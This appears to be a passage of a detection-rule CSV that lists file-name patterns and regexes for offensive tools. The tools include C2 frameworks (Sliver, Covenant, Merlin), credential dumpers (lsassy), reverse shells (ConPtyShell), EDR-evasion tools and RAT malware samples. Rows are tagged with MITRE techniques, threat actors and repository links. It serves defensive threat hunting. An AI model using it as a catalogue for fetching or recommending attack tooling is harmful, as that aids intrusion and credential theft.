"*/COM-Hunter.csproj*",".{0,1000}\/COM\-Hunter\.csproj.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","6159"
"*/COM-Hunter.exe*",".{0,1000}\/COM\-Hunter\.exe.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","6160"
"*/COM-Hunter.git*",".{0,1000}\/COM\-Hunter\.git.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","6161"
"*/COM-Hunter.sln*",".{0,1000}\/COM\-Hunter\.sln.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","6162"
"*/COMInjectTarget.dll*",".{0,1000}\/COMInjectTarget\.dll.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","6163"
"*/Command Reciever.exe*",".{0,1000}\/Command\sReciever\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6164"
"*/Command%20Reciever.exe*",".{0,1000}\/Command\%20Reciever\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","6165"
"*/command/exec/sideload.go*",".{0,1000}\/command\/exec\/sideload\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","6166"
"*/command/exec/spawndll.go*",".{0,1000}\/command\/exec\/spawndll\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","6167"
"*/command_exec.exe*",".{0,1000}\/command_exec\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","6168"
"*/commandcontrol/malware*.py*",".{0,1000}\/commandcontrol\/malware.{0,1000}\.py.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","6169"
"*/commander-runme*",".{0,1000}\/commander\-runme.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","6170"
"*/commando-vm*",".{0,1000}\/commando\-vm.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","6171"
"*/commix.git",".{0,1000}\/commix\.git","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/commixproject/commix","1","1","N/A","N/A","N/A","10","5245","872","2025-04-13T08:55:27Z","2015-03-20T08:38:26Z","6172"
"*/commix.py*",".{0,1000}\/commix\.py.{0,1000}","offensive_tool_keyword","commix","Automated All-in-One OS command injection and exploitation tool.","T1059 - T1053 - T1503","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tool","https://github.com/commixproject/commix","1","1","N/A","N/A","N/A","10","5245","872","2025-04-13T08:55:27Z","2015-03-20T08:38:26Z","6173"
"*/common/beacon.go*",".{0,1000}\/common\/beacon\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","6174"
"*/COM-Object-hijacking.git*",".{0,1000}\/COM\-Object\-hijacking\.git.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","1","N/A","N/A","8","1","58","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z","6175"
"*/completions/exegol.fish*",".{0,1000}\/completions\/exegol\.fish.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","6176"
"*/comsvcs_stealth.py*",".{0,1000}\/comsvcs_stealth\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","6177"
"*/ComunicationC2.cpp*",".{0,1000}\/ComunicationC2\.cpp.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","6178"
"*/CONCRETE_STEEL.exe""*",".{0,1000}\/CONCRETE_STEEL\.exe\"".{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","6179"
"*/conf/c2profiles.json*",".{0,1000}\/conf\/c2profiles\.json.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#linux","N/A","9","","N/A","","","","6180"
"*/config/doNmapScanWin.bat *",".{0,1000}\/config\/doNmapScanWin\.bat\s.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","6182"
"*/configdhcpserver.sh*",".{0,1000}\/configdhcpserver\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","6183"
"*/Configure-Victim.ps1*",".{0,1000}\/Configure\-Victim\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","6184"
"*/ConfuserEx.exe*",".{0,1000}\/ConfuserEx\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","6185"
"*/ConfuserEx.git*",".{0,1000}\/ConfuserEx\.git.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","6186"
"*/confuserex.py*",".{0,1000}\/confuserex\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","6187"
"*/ConfuserEx_bin.zip*",".{0,1000}\/ConfuserEx_bin\.zip.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","1","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","6188"
"*/ConPtyShell/*",".{0,1000}\/ConPtyShell\/.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","6191"
"*/ContainYourself.git*",".{0,1000}\/ContainYourself\.git.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","6192"
"*/ConvertToShellcode.py*",".{0,1000}\/ConvertToShellcode\.py.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","1","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","6193"
"*/CookieProcessor.cs*",".{0,1000}\/CookieProcessor\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","N/A","10","10","194","23","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z","6194"
"*/Coolvibes.exe*",".{0,1000}\/Coolvibes\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6195"
"*/Cooolis-ms/*",".{0,1000}\/Cooolis\-ms\/.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","6196"
"*/Cordyceps.git*",".{0,1000}\/Cordyceps\.git.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","1","N/A","N/A","10","3","N/A","N/A","N/A","N/A","6197"
"*/core/browser_darwin.go*",".{0,1000}\/core\/browser_darwin\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","#linux","N/A","10","10","175","25","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z","6198"
"*/core/browser_linux.go*",".{0,1000}\/core\/browser_linux\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","#linux","N/A","10","10","175","25","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z","6199"
"*/core/browser_windows.go*",".{0,1000}\/core\/browser_windows\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","N/A","10","10","175","25","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z","6200"
"*/Coringa-RAT 0.1.exe*",".{0,1000}\/Coringa\-RAT\s0\.1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6201"
"*/CORINGA-RAT.exe*",".{0,1000}\/CORINGA\-RAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6202"
"*/Corrupt_AMSI.py*",".{0,1000}\/Corrupt_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","6203"
"*/Corrupt_AMSI.vba*",".{0,1000}\/Corrupt_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","6204"
"*/couchdb-databases.nse*",".{0,1000}\/couchdb\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6205"
"*/couchdb-stats.nse*",".{0,1000}\/couchdb\-stats\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6206"
"*/Covenant*.cs*",".{0,1000}\/Covenant.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","6207"
"*/Covenant.git*",".{0,1000}\/Covenant\.git.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","6208"
"*/Covenant/*",".{0,1000}\/Covenant\/.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","6209"
"*/CovenantUsers/*",".{0,1000}\/CovenantUsers\/.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","6210"
